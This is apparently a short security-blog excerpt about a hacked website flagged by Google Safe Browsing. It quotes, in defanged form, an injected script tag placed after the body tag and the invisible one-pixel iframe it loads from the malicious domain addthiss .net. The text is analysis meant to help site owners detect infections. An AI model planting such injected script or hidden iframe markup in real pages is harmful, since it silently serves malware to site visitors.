Loading site search ...
Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:
Malicious software is hosted on 1 domain(s), including addthiss .net/.
Unmask Parasites didn’t detect anything suspicious but a quick manual check revealed the following script tag right after the <body> tag in every web page:
<sc ript type="text/javascript" src="newgeocheck.js"></script>
(Unmask Parasites doesn’t check .js file, so no wonder it couldn’t detect the source of the problem)
This script loaded an invisible iframe form addthiss .net.
<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>
Here goes the real investigation »»
